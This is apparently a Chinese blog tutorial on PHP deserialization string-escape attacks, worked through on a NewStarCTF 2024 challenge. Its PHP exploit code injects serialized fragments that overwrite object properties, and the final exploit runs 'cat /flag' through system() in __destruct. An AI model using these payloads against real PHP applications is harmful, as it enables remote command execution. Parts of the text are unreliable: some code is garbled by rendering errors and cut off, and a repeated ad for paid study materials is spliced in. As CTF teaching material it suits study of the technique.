php反序列化学习之字符串逃逸(1)，妈妈再也不用担心我的面试

最新推荐文章于 2024-09-27 16:14:02 发布

afagagagaa

最新推荐文章于 2024-09-27 16:14:02 发布

阅读量718

点赞数 12

分类专栏： 2024年程序员学习文章标签： php 学习面试

本文链接：https://blog.csdn.net/afagagagaa/article/details/137577000

版权

2024年程序员学习专栏收录该内容

63 篇文章 0 订阅

订阅专栏

print(filter_repmore(serialize( $KaTeX parse error: Undefined control sequence: \n at position 11: test1)))."\̲n̲"; var\_dump(un…$ test1))));

在这里插入图片描述

这里就是读取了一个c之后，然后停止读取内容，后面就应该读取结束符来构成闭合，但这里是c不是"，因此失败，如果我们自己在name属性的值中，添加 "; 让它完成闭合，再跟上符合格式的序列化字符串，结尾跟上结束符，让php继续执行反序列化流程，似乎就可以成功了，后面的序列化字符串也是我们可以控制的，就像上面的绿框，我们把ctfer改为hacker，长度改为6，如果能让它成功反序列化，就达到了修改info的目的

开始尝试:
在这里插入图片描述

但是并没有像我们的预期一样构成闭合**，“; 和结束符 ;}被当成字符串的内容来读取**，因为name本身就要有值，所以就把我们的序列化字符串当做name的值，然后再去读取下一个属性来反序列化

那我们需要一点东西去填充name的值，好让php能把我们的序列化字符串去反序列化而不是当作字符串读取，这时就可以借助前面提到的过滤函数了

function filter_repmore( $KaTeX parse error: Expected '}', got 'EOF' at end of input: \dotsplace('b','cc',$ str); //把b换成cc，过滤后序列化整体字符串变长
}

前面我们也分析了，每有一个b，就会多出一个c无法被当做正常字符串去读取，而是按照正常流程去反序列化下一个属性和对应的值， ";s:4:“info”;s:6:“hacker”;} 这个我们输入的序列化字符串长度为27

如果我们把name的值换成27个b+序列化字符串，27个b就会被过滤替换为54个c，而在反序列化时，由于name的长度在序列化时就确定为54（27个b+序列化字符串），php就会把前面54个c当作name的值来读取，后面的序列化字符串就会逃逸出去，正常反序列化，从而修改info，如:

<?php include "func.php"; function filter\_repmore($str) //利用一个变量修改目标变量 { return str\_replace('b','cc',$str); } class A{ public $name='ben'; public $info="ctfer"; } $test1=new A(); print\_r($test1)."\n"; echo "\n".serialize($test1)."\n"; $tar='";s:4:"info";s:6:"hacker";}'; //27 $payload=get\_payload('b',strlen($tar),$tar); //利用getpayload生成利用的payload $test1->name=$payload; print\_r($test1)."\n"; print\_r(serialize($test1))."\n"; $res=filter\_repmore(serialize($test1)); echo "\n".$res."\n"; $c=unserialize($res); print\_r($c); ?>

在这里插入图片描述
可以看到，info的值被修改了

接下来以一道简单的题目来讲构造流程

题目实战

newstarctf 2024 week4 逃

在这里插入图片描述

可以看到，这里有个waf过滤函数，把对象序列化并过滤后再反序列化，是过滤后变长的题型

总体思路—>利用我们能控制的key去修改cmd，在__destruct中system执行cmd

具体实现:

1拿下来源码放在本地，稍作修改:

<?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd key= class GetFlag { public $key='123'; public $cmd = "ls"; #cmd是我们要去修改的，先写死 public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } echo serialize(new GetFlag()); # 这段代码就是查看正常的序列化后的字符串（其中含有我们想要的cmd值），当然如果对序列化熟悉的话可以直接构造payload ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/b3324cfb9ffb46769702a74855a5093e.png#pic_center) 把红框部分拿下来即可 2.配合前面写的get\_payload函数构造payload，并在本地尝试是否成功 bad被替换为good，一个bad可以逃逸一个字符，所以需要直接传入序列化字符串长度即可 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/5efbed53f25c48bc9623bca18373bc43.png#pic_center) 可以看到，在本地实验成功，接下来只要修改cmd的值为其他系统命令，**再修改序列化字符串中cmd的长度**，然后把$payload传过去即可最后的exp: <?php include "func.php"; //highlight\_file(\_\_FILE\_\_); function waf($str) { return str\_replace("bad", "good", $str); } //利用key去修改cmd class GetFlag { public $key='ls'; public $cmd = "whoami"; public function \_\_construct($key) { $this->key = $key; } public function \_\_destruct() { system($this->cmd); } } $key='";s:3:"cmd";s:9:"cat /flag";}'; $payload=get\_payload('bad',strlen($key),$key); echo "\n".$payload; ?>

在这里插入图片描述
把payload赋值为key即可，

结果:

在这里插入图片描述

过滤后变短

实验学习

<?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload public $info="ctfer"; public $password='123456'; } 像上面的过滤函数，把b替换为空，替换后序列化的字符串长度减少，就是过滤后变短的情况，这一种就是与变长不同，要利用两个变量（info和name）去修改两个变量（info和password）第一步，也是要先拿到我们含有修改目标的序列化字符串,name值随意 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/a6e5eb41c6e3415c88b487dd3ebf41ef.png#pic_center) 我们的目的也是一样的，要通过";构造闭合，然后让php来反序列化我们设计好的序列化字符串，从而修改变量，尝试把info的值赋值为上面红框里的序列化字符串，那为什么不跟变长的类型一样，直接把序列化字符串跟在name的值后面呢？看下图: ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/839005acc18f4a89bda1c0693e37db90.png#pic_center) 如果跟在name后面，由于name的长度本身就很长，过滤后name的值变短了，我们的序列化字符串就会被读取为name的值(逃不出去)，就无法发挥它的作用了，所以要把info的值设为序列化字符串 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7cfcac1b340e471fb81ef5f8a01d4fbd.png#pic_center) 如果要让绿框内的字符串正常反序列化，而不是被当作字符串读取，红框内的全部内容就填充进name的值中，";s:4:“info”;s:60:"长度为19，**如果name的值设为19个b，经过过滤函数过滤为空后，那么php就会往下读取，把本不该读取的 “;s:4:“info”;s:60:” 读取为name的值，后面的序列化字符串就会逃逸出去，不被当作字符串来读取，而是被成功反序列化，修改info** 完整实验代码: <?php include "func.php"; function filter\_repless($str) //利用两个变量修改目标变量 { return str\_replace('b','',$str); } class C{ // name全填上会被替换的内容 public $name='ben'; // info填payload **自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。** **深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！** **因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。** ![img](https://img-blog.csdnimg.cn/img_convert/0929da6be608da57fe51285ed453ae6e.png) ![img](https://img-blog.csdnimg.cn/img_convert/bb729020b4f49c3c9907c4d54429944b.png) ![img](https://img-blog.csdnimg.cn/img_convert/155eb72266547e90bb627f5e8f63ce4c.png) ![img](https://img-blog.csdnimg.cn/img_convert/18e14fa985025d59f6af6ed448c359b6.png) ![img](https://img-blog.csdnimg.cn/img_convert/3d3963c5120b97f3f49132da63d2d7e7.png) ![img](https://img-blog.csdnimg.cn/img_convert/e9a8f23ef308b81ee39c39f1474f4817.png) **既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！** **由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新** **如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）** ![img](https://img-blog.csdnimg.cn/img_convert/86e8ed02bf02b44628f8cc987abe0bfa.png) ## 学习路线：这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。不过，要想从脚本小子变成黑客大神，这个方向越往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容： ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center) **一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！** ![img](https://img-blog.csdnimg.cn/img_convert/9b06cd06ded9e266c1631a7bb22b6ca0.png) 往后，需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容： ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center) **一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！** [外链图片转存中...(img-yA7sjxvo-1712694723633)]